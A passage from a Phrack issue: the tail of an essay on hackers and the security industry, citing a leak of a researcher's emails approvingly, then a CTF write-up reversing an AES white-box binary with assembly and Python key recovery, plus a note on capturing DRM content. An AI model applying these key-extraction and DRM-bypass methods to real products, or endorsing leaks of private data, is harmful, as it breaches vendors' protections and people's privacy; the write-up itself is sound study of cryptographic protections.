industry. The main difference between the hacking community and the security industry is about the consumers of the security industry. While in the hacking community the consumers are hackers themselves, in the security industry the consumers are companies and other entities that don't have the same behavior as hackers. The behavior of the security industry consumers is similar to the behavior of the consumers of journalism. This is because these companies are partially a subset of the consumers of journalism. These consumers do not judge work as hackers do; instead they are more ignorant and have a different set of criteria to judge work quality. It is because of this, that once a hacker joins the security industry they eventually discover that doing great work no longer means becoming a better security professional. They quickly start discovering a whole new set of rules to achieve what is considered to be the 'optimal', such as getting various industry certifications (CISSP, etc), over-hyping their research and its impact to generate press coverage, and often having to compromise their ideals in order to protect their source of income (for example the "no more free bugs", "no more free techniques" movements). Those deciding that they don't want to be a part of this quickly realize that the ones who do are the ones that rise up. Most of them try to fix the situation by calling these people out, which often makes the person being called out likely criticized by the hacking community. But that is often not the case within the security industry were they still enjoy a great deal of success. To illustrate further, it has become very prevalent to announce discoveries and claim that by making the vulnerability details public catastrophic consequences would ensue, as we'll see in the example below. Most of the hacking community are quick to criticize this behavior, often ostracizing the person making the claim, and in a few cases hacking them in an attempt to publicly expose them. However, this practice only has an impact within the hacking community. In the security industry an opposite effect happens and the person in question achieves a higher status that allows him to present in the top security industry conferences. This person is also praised for choosing to responsibly disclose the vulnerability thus obtaining an overall security status of guru. To illustrate this let's look at a real world example. On July 28, 2009, during the Las Vegas based Black Hat Briefings industry conference, the ZF05 ezine was released. The ezine featured a number of well respected security researchers and how they were hacked. But one of these researchers stood out, namely Dan Kaminsky. The reason why he stood out was that one year before, a couple of months before Black Hat Briefings, Dan Kaminsky decided to announce that he had a critical bug on how DNS servers operated [0]. Moreover he announced that he had decided, for the benefit of Internet security, to release the technical details only during his Black Hat Briefings speech that year. The response to this decision was very polarized. On one side there was the "vendor" and information security industry that praised Dan for following responsible disclosure. On the other hand, some of the more prominent security people, criticized this approach [1]. Dan in turn positioned himself as a martyr, stating that everyone was going against him, but he was willing to sacrifice himself in order to protect the Internet. When ZF05 was released, Dan Kaminsky's email spool and IRC logs were published in it. The released data included a number of emails he exchanged during the time he released the DNS bug. The emails showed exactly what everyone in the hacking community already knew; that Dan Kaminsky was anything but a martyr, and that everything was a large publicity stunt [2]. Even though the data were completely embarrassing and publicly exposed Dan Kaminsky for what he really was, a master at handling the press, this had no impact outside of the hacking community. That year, again, Dan Kaminsky took a stand in the Black Hat Briefings conference to deliver a talk, and was again praised. He was also later chosen to be the American representative who holds the backups of the global DNS root keys [3]. This demonstrates that no matter how severe a security industry figure gets owned by hackers literally (e.g. publishing their email spools and IRC logs) or figuratively (e.g. showing qualitative evidence that their research is flawed, stolen, inaccurate or simply unoriginal), these individuals continue to enjoy a great deal of respect from the security industry. To quote Paris Hilton, "There's no such thing as bad press". With time those that choose not to compromise either live an unhappy life frustrated by these so called "hackers" that get their recognition from the security industry while they themselves are seen as security consultants who just can't market themselves, or they simply choose to change their entire career, often burned out and proclaiming that hacking is dead. --[ 4 - Rebirth Since the idea behind this paper is not to expose anyone, or complain about the security industry, we want to leave this aside and move on to what exactly a hacker can do to hack happiness. The rebirth section is then a logical reasoning exercise on the different paths that are available to a hacker who is also part of the information security consulting community, as seen from the happiness maximization perspective. The first path is to keep fighting. This path is quite popular; over the years we have seen many hackers forming groups and follow this path (el8, h0n0, Zero for 0wned, project m4yh3m, etc). But don't get too excited since most of the teams that follow this path eventually disintegrate; I'll try to explain the reasons why this happens. First, remember that humans are very bad at predicting what would bring them happiness. With that in mind, most of these groups form with the ideal of exerting a big change onto the security community. The problem with this approach is that they really have no control over the consumers of the industry, which is exactly where the problem really is. As these groups try to exert a change they quickly discover that even when their actions lead to undeniable proof of their arguments and are completely convincing to other hackers, they don't seem to affect regular people. Their initial victories and support from the hacking community will bring them a new wave of happiness, but as time goes frustration from not being able to have an impact beyond the hacker community will then start to build up, which leads to their level of happiness to drop, eventually disintegrating the group. You would be wise, if you are thinking of taking this path not to take my word for it, but just look at the history of the groups that precede you, and then decide. Your other path is simply to ignore all of this and just keep working on the sidelines as a security consultant. As someone who was once part of the security industry - being on the sidelines without compromising my ideals while I saw others which had little skills rise - I can honestly tell you it will make you sick. For some people, professional success is a very important part of their overall happiness. So if you choose to follow this path first make sure that professional success is not a very important part of your life. If that is the case, instead focus on other activities from which you can derive happiness. One great choice is participating in open source projects, or building one yourself. There are of course many other alternatives like family, sports etc, all of which can bring you immense happiness. On the other hand, if your personality is that of someone very ambitious, following this path will make you very unhappy for obvious reasons. Finally there is one more path. Simply accepting this is how the security industry works (these are the rules of the game), and playing the game. In this scenario, as you begin to rise you will discover that in order to move higher you are going to have to make some ethical compromises, and by doing so to rise up in the information security industry. Unfortunately, even though your professional success will bring some happiness with it, you will start to feel as if you sold your "soul" to the devil. This feeling will start bringing your happiness levels down, and the more you compromise the bigger impact this will have. At the same time, you will start hating your job for forcing you to compromise your ideals. This in effect will cause your professional success to no longer bring you any happiness. The combination of both hating your job and compromising your ideals will bring your happiness levels very low. Eventually you will falsely reach the conclusion that you no longer like hacking, that hacking is dead, and this is why you feel so unhappy. Fortunately for you, the security industry is not the only option. Your skills and intelligence will be valued in different industries. It is up to you to decide what kind of career you would like to pursue. Many hackers choose to work as software engineers, which is a very good option since they already poses a great deal of knowledge in this area. But you are not restricted to the software engineering industry. In fact I've seen cases were hackers have chosen careers that have nothing to do with computing, far away actually, such as music or art, and they are quite successful and happy. This does not mean you are giving up on hacking; in fact it is quite the opposite. Many people, including myself, do hacking as a hobby and choose to participate in a different industry for our living income. If you choose this path you will realize that as being part of this community will bring you a lot of happiness. Deep inside you already know this if you are reading this article. The real reason you started hacking in the first place was not because you were good at it, or because you liked computers; it was because it made you happy and there is no reason why this has to change. For those of you that have been in the security industry for a while, which are unhappy with the current situation and are blaming the hacking community for this, don't. Understand that it is not the hacking community which has problems but the security industry and that once you start hacking as a hobby again those feelings you once had will come back. --[ 5 - Conclusions I hope I brought some understanding to what makes people happier, what you should look into any industry you seek to work in if you want to maximize your happiness, and more importantly how the security industry behaves. Hopefully some of you will be able to make better decisions, and ultimately the conclusion should be: - Hacking will never die, because ultimately we all want happiness, and hacking brings happiness. - HAPPY HACKING! --[ 6 - References [0] http://dankaminsky.com/2008/07/09/an-astonishing-collaboration/ [1] https://lists.immunityinc.com/pipermail/dailydave/2008-July/005177.html [2] http://attrition.org/misc/ee/zf05.txt [3] http://www.root-dnssec.org/tcr/selection-2010/ --[ EOF ============== Page 8/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x08 of 0x13 |=-----------------------------------------------------------------------=| |=--------=[ Practical cracking of white-box implementations ]=---------=| |=-----------------------------------------------------------------------=| |=---------------=[ by SysK - whiteb0x [o] phrack o org ]=---------------=| |=-----------------------------------------------------------------------=| ------- 1 - Introduction 2 - What is a WB implementation? 3 - The things you should know about white-boxes 3.1 - Products available 3.2 - Academic state of the art 4 - Handling the first case: hack.lu's challenge 4.1 - The discovery step 4.2 - The key recovery 4.3 - Random thoughts 5 - White-boxing the DES 5.1 - The DES algorithm 5.2 - An overview of DES WB primitives 6 - Breaking the second case: Wyseur's challenge 6.1 - Efficient reverse engineering of the binary 6.2 - The discovery step 6.3 - Recovering the first subkey 6.4 - Recovering the original key 7 - Conclusion 8 - Gr33tz 9 - References 10 - Appendix: Source code ------- --[ 1 - Introduction This paper is about WB (white-box) cryptography. You may not have heard too much about it but if you're focused on reverse engineering and more precisely on software protections, then it may be of interest for you. Usually The common way to learn something valuable in cryptography is either to read academic papers or cryptography books (when they're written by true cryptographers). However as cryptography is about maths, it can sometimes seem too theoretical for the average reverser/hacker. I'm willing to take a much more practical approach using a combination of both reverse engineering and elementary maths. Obviously such a paper is not written for cryptographers but rather for hackers or crackers unfamiliar with the concept of white-box and willing to learn about it. Considering the quasi non existence of public implementations to play with as well as the 'relatively' small amount of valuable information on this subject, I hope this will be of interest. Or at the very least that it will be a pleasant read... O:-) --[ 2 - What is a WB implementation? So let's begin with a short explanation. A white-box is a particular implementation of a cryptographic primitive designed to resist to the examination of its internals. Consider the case of a binary embedding (and using) a symmetric primitive (such as AES for example). With the common implementations, the AES key will always leak in memory at some point of the execution of the program. This is the classic case of a reverser using a debugger. No matter how hard it may be (anti-debug tricks, obfuscation of the key, etc.), he will always find a way to intercept the key. White-box cryptography techniques were designed to solve this problematic which is very common, especially in the field of DRM (Digital Rights Management). So how does it work? The main concept that you should remember is that the key is never explicit. Or you could say that it's mathematically transformed or 'fused' with the encryption routine. So for one key there is one particular obfuscated primitive which is strictly equivalent to the original one*. For a same input, both implementations will produce an identical output. The mathematical transformation is designed in such a way that an attacker with a debugger will not be able to deduce the key from the internal state ... at least in a perfect world :-) *: It's not 'exactly' true as we will see later with external encodings. Confused? Then take a look at this tiny example: -> Function1: for x in [0:3] f(x) = (k+x) % 4 -> Function2: for x in [0:3] g(x) = S[x] with S = [3,0,1,2] If k==3, then the two functions f() and g() are equivalent. However the first one explicitly uses the key 'k' whereas the second one doesn't, being implemented as a lookup table (LUT). You could say that g() is a white-box implementation of f() (albeit a very weak one) for the key 3. While this example is easy to understand, you will soon discover that things are more complicated with the obfuscation of a whole real life crypto primitive. --[ 3 - The things you should know about white-boxes <<<<<<<<<<<<<<<<<< DISCLAIMER <<<<<<<<<<<<<<<<<< > I will voluntarily not enter into too much < > details. As I said, the paper is based on a < > practical approach so let's avoid the maths < > for the moment. < >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ----[ 3.1 Products available WB cryptography is essentially implemented in commercial security products by a relatively small number of companies (Cloakware -acquired by Irdeto-, Whitecryption, Arxan, Syncrosoft, etc.). Usually they provide a secure API which is then integrated into other security primitives, often for DRM purposes. Amongst other things, they design WB primitives for symmetric encryption (DES, AES) but also MAC (HMAC, CMAC) and asymmetric primitives (ECC, RSA, DSA). How often do we come across WB in the wild? More than you could think of! For example you can see in [R10] that Irdeto has many famous customers including TI, Sony, Adobe and NetFLIX. WB cryptography will most likely become more and more present in software protections. As far as I can tell, there are unfortunately only 2 public (non commercial) examples of WB implementations, both with undisclosed generators: - The first historical one is a binary available on Brecht Wyseur's website [R04] and is a WB DES implementation. Brecht challenges people to find the key: "If you like, try to extract the secret key, using all information you can find from this implementation (besides brute-force black-box attacks of course)." Keep in mind that this is a challenge, not some production code. - The second one less likely to be known is a challenge proposed by Jb for the 2009 edition of hack.lu [R02]. This one is a simplistic AES WB but was never labeled officially as such. Part of the challenge is indeed to find out (oops!). The cryptanalysis involved is obviously far below the academic state of the art but it's nonetheless an interesting one and a first step for who wants to be serious and aims at defeating more robust implementations. We'll study both starting with Jb's binary and see how the solution can be found in each case. ,---. ,.'-. \ ( ( ,'"""""-. `,X `. /` ` `._ ( , ,_\ | ,---.,'o `. | / o \ ) \ ,. ( .____, \| \ \____,' \ '`'\ \ _,____,' \ ,-- ,-' \ ( C ,' \ `--' .' | | | .O | __| \ ,-'_ / `L `._ _,' ' `. / `--.._ `',. _\ ` `-. /\ | `. ( ,\ \ _/ `-._ / \ |--' ( \ ' `-. `' \/\`. `. ) \ -hrr- \ `. | | ----[ 3.2 Academic state of the art AFAIK academic publications are limited to symmetric encryption and especially to DES and AES (though SPN case is somewhat extended in [R08]). Explaining the history of the design and the cryptanalysis techniques which were developed would be complicated and is already explained with great details in the thesis of Brecht Wyseur [R04]. The main question is to know if there exists a secure WB design and if you consider the current state of the art in cryptography, well... there isn't! There is currently no implementation proposal not broken by design. And in this case, broken means a key recovery in a matter of seconds in the worst case. Yes, _that_ broken! However, real-life white-box cryptography may be different because: - As explained before, proprietary implementations of algorithms not mentioned in any paper (MAC algorithms, asymmetric ones) exist. This proves that people were smart enough to design new implementations. On the other hand, without any formal analysis of these implementations, nothing can be said regarding their effective security. - Cloakware products were at least partially designed/written by the cryptographers who designed the first white-box [R7]. On one hand you may suspect that their product is broken by design. Alternatively it can be assumed that it is at least immune against current cryptanalysis techniques. Little can be said about other protections (whitecryption, Arxan, Syncrosoft) but we could speculate that it's not of the same caliber. So are WB protections hard to break in practice? Who knows? But remember that protecting the key is one thing while protecting a content is something different. So if you ever audit a white-box solution, before trying to retrieve the key, see if you can intercept the plaintexts. There are lots of possible attacks, potentially bypassing the WB protections [R06]. Remark: Obviously in the case of DRM (if no hardware protection is involved), you will always find a way to intercept unencrypted data. This is because at some point the player will have to send audio/video streams to the sound/video card drivers and you may want to hook some of their functions to recover the media. This is however a practice to forget if the media requires the synchronization of several streams (i.e. movies with both audio and video). Now that said, let's begin with the first challenge :) --[ 4 - Handling the first case: hack.lu's challenge I have to thank Jb for this binary as he was the one who suggested me to solve it a few days ago*. Unfortunately my solution is biased as I knew from the very beginning that it was an AES white-box. I may have taken a different approach to solve it if I hadn't. This is however a good enough example to introduce WB protections. *: Phrack being usually late "a few days ago" probably means "a few weeks** ago" **: Phrack being _indeed_ late "a few weeks ago" is now "a few months ago" ;> ----[ 4.1 - The discovery step Since the challenge is about breaking an AES white-box, it means that we may need to perform several tasks: - finding out if the WB is an AES or an AES^-1 and the associated key length: 16 (AES-128), 24 (AES-192), 32 (AES-256)? We want to discover exactly *what* was white-boxed. - reversing every cryptographic functions involved and discovering how they are related to the original AES functions. This is about understanding *how* the implementation was white-boxed. - finding a way to recover the original key. I won't describe the AES as it's not necessary to understand this part. The necessary details will be provided a bit later. First of all, let's see how the serial is retrieved. We'll start by a quick reverse engineering of the sub_401320() function: --------------------------------------------------------------------------- mov eax, [esp+38h+hDlg] push 21h ; cchMax lea ecx, [esp+3Ch+String] push ecx ; lpString push 3ECh ; nIDDlgItem push eax ; hDlg call ds:GetDlgItemTextA cmp eax, 20h ; is length == 32? --------------------------------------------------------------------------- Without too much surprise, GetDlgItemText() is called to retrieve an alpha-numeric string. The comparison in the last line implies a length of 32 bytes in its ASCII representation (not including the null byte) hence a 16 bytes serial. Let's continue: --------------------------------------------------------------------------- cmp eax, 20h jz short good_serial ; if len is ok then start the ; conversion bad_serial: xor eax, eax [...] retn ; return 0 good_serial: push ebx push esi xor esi, esi ; i=0 nop build_data_buffer: movzx edx, [esp+esi*2+40h+String] push edx call sub_4012F0 ; get least significant nibble mov ebx, eax movzx eax, [esp+esi*2+44h+var_27] push eax shl bl, 4 call sub_4012F0 ; get most significant nibble or bl, al ; bl is now a converted byte mov byte ptr [esp+esi+48h+input_converted], bl ; input_converted[i] = bl inc esi ; i++ add esp, 8 cmp esi, 10h jl short build_data_buffer lea ecx, [esp+40h+input_converted] push ecx mov edx, ecx push edx call sub_401250 ; white-box wrapper add esp, 8 pop esi mov eax, 10h xor ecx, ecx pop ebx ; Compare the resulting buffer byte after byte compare_buffers: mov edx, [esp+ecx+38h+input_converted] cmp edx, dword ptr ds:aHack_lu2009Ctf[ecx] ; "hack.lu-2009-ctf" jnz short bad_serial sub eax, 4 add ecx, 4 cmp eax, 4 jnb short compare_buffers [...] retn --------------------------------------------------------------------------- The alphanumeric string is then converted byte after byte using the sub_4012F0() function in the corresponding plaintext (or ciphertext) block for cryptographic manipulations. The function sub_401250() is then called taking it as a parameter. When the function returns, the buffer is then compared to the "hack.lu-2009-ctf" string (16 bytes). If both are equal, the serial is valid (the function returns 1). Let's see sub_401250() in more detail: --------------------------------------------------------------------------- sub_401250 proc near ; WrapperWhiteBox [...] mov eax, [esp+14h+arg_0] push esi mov esi, [esp+18h+arg_4] xor ecx, ecx add eax, 2 lea esp, [esp+0] permutation1: ; First step is a transposition (special permutation) movzx edx, byte ptr [eax-2] mov [esp+ecx+18h+var_14], dl movzx edx, byte ptr [eax-1] mov [esp+ecx+18h+var_10], dl movzx edx, byte ptr [eax] mov [esp+ecx+18h+var_C], dl movzx edx, byte ptr [eax+1] mov [esp+ecx+18h+var_8], dl inc ecx add eax, 4 cmp ecx, 4 jl short permutation1 ; Second step is calling the white-box lea eax, [esp+18h+var_14] push eax call sub_401050 ; call WhiteBox [...] permutation2: ; Third step is also a transposition ; Bytes' position are restored movzx edx, [esp+ecx+14h+var_14] mov [eax-2], dl movzx edx, [esp+ecx+14h+var_10] mov [eax-1], dl movzx edx, [esp+ecx+14h+var_C] mov [eax], dl movzx edx, [esp+ecx+14h+var_8] mov [eax+1], dl inc ecx add eax, 4 cmp ecx, 4 jl short permutation2 [...] retn --------------------------------------------------------------------------- At first sight, sub_401250() is composed of three elements: - A first bunch of instructions operating on the buffer which is no more than a (4x4) matrix transposition operating on bytes. For example: A B C D A E I M E F G H becomes B F J N I J K L C G K O M N O P D H L P This is a common step to prepare the plaintext/ciphertext block into the so-called "state" as the AES is operating on 4x4 matrix. - This function is then calling sub_401050() which is composed of elementary operations such as XOR, rotations and substitutions. - A second transposition. One important thing to know about the transposition is that the function is its own inverse. The former bytes' positions are thus restored. sub_401050() is the WB. Whether it's an AES or an AES^-1 function and its keylength has yet to be determined. The serial acts as a plaintext or a ciphertext which is (de,en)crypted using a key that we want to retrieve. Since the output buffer is compared with an English sentence, it seems fair to assume that the function is an AES^-1. Reverse engineering of sub_401050() ----------------------------------- Detailing the whole reverse engineering steps is both boring and meaningless as it doesn't require special skills. It's indeed pretty straightforward. The resulting pseudo C code can be written as such: ----------------------------- First version ------------------------------- void sub_401050(char *arg0) { int round,i; // 9 first rounds for(round=0; round<9; round++) { // step-1(round) for(i=0; i<16; i++) arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ]; // step-2 sub_401020(arg0); // step-3 for(i=0; i<4; i++) { char cl,dl, bl, var_1A; cl = byte_414000[ arg0[0+i]*4 ]; cl ^= byte_414400[ arg0[4+i]*4 ]; cl ^= byte_414800[ arg0[8+i]*4 ]; cl ^= byte_414C00[ arg0[12+i]*4 ]; dl = byte_414000[ 1 + arg0[0+i]*4 ]; dl ^= byte_414400[ 1 + arg0[4+i]*4 ]; dl ^= byte_414800[ 1 + arg0[8+i]*4 ]; dl ^= byte_414C00[ 1 + arg0[12+i]*4 ]; bl = byte_414000[ 2 + arg0[0+i]*4 ]; bl ^= byte_414400[ 2 + arg0[4+i]*4 ]; bl ^= byte_414800[ 2 + arg0[8+i]*4 ]; bl ^= byte_414C00[ 2 + arg0[12+i]*4 ]; var_1A = bl; bl = byte_414000[ 3 + arg0[0+i]*4 ]; bl ^= byte_414400[ 3 + arg0[4+i]*4 ]; bl ^= byte_414800[ 3 + arg0[8+i]*4 ]; bl ^= byte_414C00[ 3 + arg0[12+i]*4 ]; arg0[0+i] = cl; arg0[4+i] = dl; arg0[8+i] = var_1A; arg0[12+i] = bl; } } // step-4 for(i=0; i<16; i++) arg0[i] = (char) 0x411138 [ i + arg0[i] * 16 ] // step-5 sub_401020(arg0); return; } ----------------------------- First version ------------------------------- It seems that we have a 10 (9 + 1 special) rounds which probably means an AES-128 or an AES-128^-1 (hence a 16 bytes keylength as both are related). Remark: Something very important is that we will try to solve this problem using several assumptions or hypotheses. For example there is no evident proof that the number of rounds is 10. It _seems_ to be 10 but until the functions (and especially the tables) involved are not analyzed, we should always keep in mind that we may be wrong with the guess and that some evil trick could have been used to fool us. Now we have the big picture, let's refine it a bit. For that, we will analyze: - The tables at addresses 0x408138 (step-1) and 0x411138 (step-4) - The round independent function sub_401020 (step-2, step-5) - step-3 and the 16 arrays byte_414x0y with: - x in {0,4,9,C} - y in {0,1,2,3} The tables are quite easy to analyze. A short look at them show that there is one substitution table per character per round. Each substitution seems to be a "random" bijection. Additionally, 0x408138 + 16*256*9 = 0x411138 (which is the address of the last round's table). The function sub_401020() is a mere wrapper of function sub_401000(): --------------------------------------------------------------------------- void sub_401020(arg0) { int i; for(i=0; i<4; i++) sub_401000(arg0, 4*i, i); } // arg4 parameter is useless but who cares? void sub_401000(arg0, arg4, arg8) { if(arg8 != 0) { (int) tmp = ((int)arg0[4*arg8] << (8*arg8)) & 0xFFFFFFFF; (int) arg0[4*arg8] = tmp | ((int)arg0[4*arg8] >> (32-(8*arg8))); } return; } --------------------------------------------------------------------------- This is clearly the ShiftRows() elementary function of the AES. For example: 59 49 90 3F 59 49 90 3F [ <<< 0 ] 30 A7 02 8C becomes A7 02 8C 30 [ <<< 1 ] 0F A5 07 22 07 22 0F A5 [ <<< 2 ] F9 A8 07 DD DD F9 A8 07 [ <<< 3 ] here '<<<' is a cyclic shift ShiftRows() is used in the encryption function while the decryption function uses its inverse. Unless there is a trap to fool us, this is a serious hint that our former assumption was wrong and that the WB is an AES, not an AES^-1. Now regarding step-3 let's begin by looking at the tables. They all hold bijections but clearly neither random nor distinct ones. Let's look for example at the byte_414400 table: byte_414400 : 0 3 6 5 C F A 9 ... (The elements of this table are located at 0x414400, 0x414404, 0x41440C, etc. This is because of the *4 that you can see in the C code. This rule also applied to the 15 other tables.) If you ever studied/implemented the AES then you must know that its structure is algebraic. The MixColumns in particular is an operation multiplying each columns of the state by a particular 4x4 matrix. The coefficients of such mathematical objects are _not_ integers but rather elements of GF(2^8) whose representation is fixed by a particular binary polynomial. Now if you don't have a clue about what I'm saying let's just say that the multiplication of said AES coefficients is not a simple integer multiplication. Since the calculus in itself would be highly inefficient most implementations use special tables holding the precomputed results. AES requires to know how to multiply by 01, 02, and 03 in GF(2^8). In particular byte_414400 is a table used to compute b = 3*a in such field (a is the index of the table and b is the value stored at this index). Now let's look at the tables. In each case it was easy to see that they were holding a precomputed multiplication by a given coefficient: byte_414000 : 0 2 4 6 8 A C E ... // Coef = 2 byte_414400 : 0 3 6 5 C F A 9 ... // Coef = 3 byte_414800 : 0 1 2 3 4 5 6 7 ... // Coef = 1 byte_414C00 : 0 1 2 3 4 5 6 7 ... // Coef = 1 byte_414001 : 0 1 2 3 4 5 6 7 ... // Coef = 1 byte_414401 : 0 2 4 6 8 A C E ... // Coef = 2 byte_414801 : 0 3 6 5 C F A 9 ... // Coef = 3 byte_414C01 : 0 1 2 3 4 5 6 7 ... // Coef = 1 byte_414002 : 0 1 2 3 4 5 6 7 ... // Coef = 1 byte_414402 : 0 1 2 3 4 5 6 7 ... // Coef = 1 byte_414802 : 0 2 4 6 8 A C E ... // Coef = 2 byte_414C02 : 0 3 6 5 C F A 9 ... // Coef = 3 byte_414003 : 0 3 6 5 C F A 9 ... // Coef = 3 byte_414403 : 0 1 2 3 4 5 6 7 ... // Coef = 1 byte_414803 : 0 1 2 3 4 5 6 7 ... // Coef = 1 byte_414C03 : 0 2 4 6 8 A C E ... // Coef = 2 As a result, step-3 can be written as: [ arg0(0,i) [ 02 03 01 01 [ arg0(0,i) arg0(4,i) = 01 02 03 01 x arg0(4,i) arg0(8,i) 01 01 02 03 arg0(8,i) arg0(c,i) ] 03 01 01 02 ] arg0(c,i) ] And this is exactly the MixColumns of the AES! Everything taken into account gives this new version of sub_401250(): ---------------------------- Second version ------------------------------- void sub_401050(char *arg0) { int round,i; // 9 first rounds for(round=0; round<9; round++) { // step-1(round) for(i=0; i<16; i++) arg0[i] = (char) 0x408138[ i + (arg0[i] + round*0x100)*16 ]; // step-2 ShiftRows(arg0); // step-3 MixColumns(arg0); } // Last round // step-4 for(i=0; i<16; i++) arg0[i] = (char) 0x411138 [ i + arg0[i]*16 ]; // step-5 ShiftRows(arg0); return; } ---------------------------- Second version ------------------------------- This confirms the assumption that the WB is an AES as AES^-1 uses the invert function of MixColumns which makes use of a different set of coefficients (matrix inversion). As you can see the key material is not explicit in the code, somehow hidden in the tables used in step-1. Kinda normal for a WB ;) ----[ 4.2 - The key recovery The general algorithm (not including the key schedule which generates K) of AES-128 encryption is the following: --------------------------------------------------------------------------- ROUNDS=10 def AES_128_Encrypt(in): out = in AddRoundKey(out, K[0]) for r in xrange(ROUNDS-1): SubBytes(out) ShiftRows(out) MixColumns(out) AddRoundKey(out,K[r]) SubBytes(out) ShiftRows(out) AddRoundKey(out, K[10]) return out --------------------------------------------------------------------------- Where K[r] is the subkey (16 bytes) used in round r. From now on, 'o' is the symbol for the composition of functions, this allows us to write: SubBytes o AddRoundKey(K[r],IN) = step-1(IN,r) for r in [0..9] Exploiting the first round, this immediately gives a system of equations (with S being located at 0x408138): SubBytes(K[0][i] ^ arg0[i]) = S[ i + arg0[i]*16 ] for i in [0..15] The equations hold for any arg0[i] and in particular for arg0[i] = 0. The resulting simplified system is thus: SubByte(K[0][i]) = S[i] for i in [0..15] K[0][i] = SubByte()^-1 o S[i] for i in [0..15] Let's try it on the rub^Wpython console: --------------------------------------------------------------------------- >>> sbox2 = inv_bij(sbox); # We compute SubBytes^-1 >>> S = [0xFA, 0xD8, 0x88, 0x91, 0xF1, 0x93, 0x3B, 0x39, 0xAE, 0x69, 0xFF, 0xCB, 0xAB, 0xCD, 0xCF, 0xF7]; # dumped @ 0x0408138 >>> for i in xrange(16): ... S2[i] = sbox2[S2[i]]; ... >>> S2; [20, 45, 151, 172, 43, 34, 73, 91, 190, 228, 125, 89, 14, 128, 95, 38] --------------------------------------------------------------------------- But remember that a transposition is necessary to retrieve the subkey! --------------------------------------------------------------------------- >>> P = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15] #I'm lazy :) >>> S4 = [] >>> for i in xrange(16): ... S4.insert(i,S2[P[i]]) --------------------------------------------------------------------------- Now S4 holds the subkey K[0]. An interesting property of the AES key schedule is that the subkey K[0] is equal to the key before derivation. This is why our priority was to exploit the first round. --------------------------------------------------------------------------- >>> s = 'hack.lu-2009-ctf' >>> key = ''.join(map(lambda x: chr(x), S4)) >>> key '\x14+\xbe\x0e-"\xe4\x80\x97I}_\xac[Y&' >>> keyObj=AES.new(key) >>> encPwd=keyObj.decrypt(s) >>> encPwd.encode('hex').upper() '192EF9E61164BD289F773E6C9101B89C' --------------------------------------------------------------------------- And the solution is the same as baboon's one [R03]. Of course there were many other ways to proceed but it's useless to even consider them due to the very weak nature of this 'WB'. ----[ 4.3 - Random thoughts Jb designed this challenge so that it could be solved in the 2-days context of the hack.lu CTF. It's very likely that any reverser familiar with the AES would be able to deal with it rather easily and so did baboon at that time when he came up with a smart and quick solution [R03]. If Jb had used the implementation described in [R07] then it would have been a whole other game though still breakable [R05]. That being said, this implementation (which is based on what is called partial evaluation) may only be a toy cipher but it's perfect to introduce more advanced concepts. Indeed several security measures (amongst others) were voluntary missing: - ShiftRows() and MixColumns() were not modified. A strong implementation would have transformed them. Additionally SubBytes() could have been transformed in a less gentle manner to mitigate trivial attacks. - There is a direct correspondence between an obfuscated function and it's unprotected "normal" counterpart. Inputs and outputs of such functions are synchronized or you could say that intermediate states can be observed. "Internal encoding" removes this property. - The first and last rounds should have a special protection. This is because the input (respectively the output) of the first (respectively the last) round can be synchronized with the normal implementation. "External encoding" is used to prevent this but as a side effect alter the compatibility with the original encryption. - etc. Remark: If you ever come across a WB implementation, let me give you 2 nice tricks to see in the blink of an eye if it's potentially weak or not: - Look at the size of the implementation. Remember that the size of an obfuscated primitive is deeply related to the number and size of the lookup tables, the weight of the opcodes being generally negligible. In this case, the binary was 85 kB whereas the state of the art requires at least 770 kB. It was thus obvious that several obfuscation layers were missing. - The fully obfuscated version of the algorithms described in [R07] only uses XOR and substitutions (lookup tables) as MixColumns and ShiftRows are both transformed to make it possible. One may however point out that the statement holds with T-tables based implementations. It's true but such implementations use well known tables so it's easy to fingerprint them. Remember that real-life white-boxes (i.e. used in DRM, embedded devices, etc.) are likely to be close to the state of the art (assuming they are designed by crypto professionals and not by the average engineer ;)). Conversely, they may also face practical problematics (size, speed) which have an impact on their security. This is especially true with embedded devices. --[ 5 - White-boxing the DES If you're still reading (hi there!) then it probably means that you already have at least a basic knowledge of cryptography. So you know that DES should not be used because of its short keylength (56 bits), right? Then why the hell should we be focused on it? Well because: - There are only 2 public white-box design families: AES and DES - If you can white-box DES, then you can probably white-box 3DES as well (which is strong) - I couldn't find a non commercial sophisticated enough AES WB to play with and I don't want to be sued by M$, Adobe, etc. :D Remark: While AES WB cryptanalysis are essentially algebraic, DES related ones are statistical as you will soon find out. ----[ 5.1 - The DES algorithm DES is a so called Feistel cipher [R01] with a block size of 64 bits and 16 rounds (r). First a permutation (IP) is applied to the input then in each round a round-function is applied which splits its input in two 32 bits buffers L (Left) and R (Right) and applies the following equations system: L(r+1) = R(r) R(r+1) = L(r) [+] f(R(r),K(r)) With: 0 <= r < 16 [+] being the XOR operation The round function is described by the following scheme: --------------------------- DES round function ---------------------------- ********** ********** * L(r) * * R(r) * ********** ********** | | .------------- | | | v .---------------------. | | .-------------. / Linear transformation \ | | \ E-Box / ( 32b -> 48b ) | | '---------' \ / | | | '---------------------' | | v .------------. | | ..... ********** / XOR operand \ | | . + .<------ * K(r) * ( 2x48b -> 48b ) | | ..... ********** \ / | | /\ '------------' | | / \ | | v v .-------------------------. | | .------. .------. / Non linear transformation \ | | \ S1 / ... \ S8 / ( using SBox ) | | '--' '--' \ 8x6b -> 8x4b / | | \ / '-------------------------' | | \ / | | v v .---------------------. | | .--------. / Linear transformation \ | | | P-Box | ( 32b -> 32b ) | | '--------' \ / | | | '---------------------' | | ..v.. .------------. | '--------->. + . / XOR operand \ | ..... ( 2x32b -> 32b ) | | \ / v v '------------' ********** ********** * L(r+1) * * R(r+1) * ********** ********** --------------------------------------------------------------------------- When the 16 rounds are completed, the IP^-1() function is applied and the result is called the ciphertext. While SBox and XOR are self explanatory, let me give you a few more details about the linear transformations (E-Box and P-Box). The E-Box --------- The E-Box is used to extend a 32 bits state into a 48b one so that each bit can be combined with a round-key bit using a XOR. To transform 32 bits into 48 bits, 16 out of the 32 bits are duplicated. This is performed using the following table: 32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9, 8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17, 16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25, 24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1 For example, the first bit of output will the last bit of input (32) and the second bit of output will be the first bit of input (1). In this particular case the bit 